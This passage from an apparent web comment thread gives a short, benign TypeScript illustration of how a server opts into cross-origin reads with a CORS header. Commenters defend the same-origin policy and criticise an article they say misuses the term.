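for anyone unfamiliar, that looks roughly like this (the hostnames are placeholders): the responding site opts in with a header, and only then will the browser let another origin’s script read the response.

```typescript
// Server side (Node-style handler, illustrative): api.example.com opting in
// to being read by scripts running on app.example.org.
import { createServer } from "node:http";

createServer((req, res) => {
  res.setHeader("Access-Control-Allow-Origin", "https://app.example.org");
  res.setHeader("Content-Type", "application/json");
  res.end(JSON.stringify({ hello: "cross-origin world" }));
}).listen(8080);

// Client side, running on https://app.example.org: without the header above,
// the browser would block this script from reading the response body.
async function readFromOtherOrigin(): Promise<void> {
  const res = await fetch("https://api.example.com/data");
  console.log(await res.json());
}
```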
the same origin policy is a good thing and it’s a fundamental requirement to allow web browsers to operate securely. i find it mildly disturbing that people are attacking it without understanding it; this really feels a bit like people who attack Section 230 without understanding it because it prevents them from passing whatever law they want.
Re:
Thank you for writing this; I had the same thought. I’ve been doing web development since the mid-1990s and professionally since 1999; this whole article is basically gibberish, trying to invent the “same origin paradigm” out of thin air. It doesn’t describe any tech or principles that actually happened; it is (as you said) co-opting the name “same origin” from the well-known Same-Origin Policy to cover a dubious, unrelated set of technologies and practices.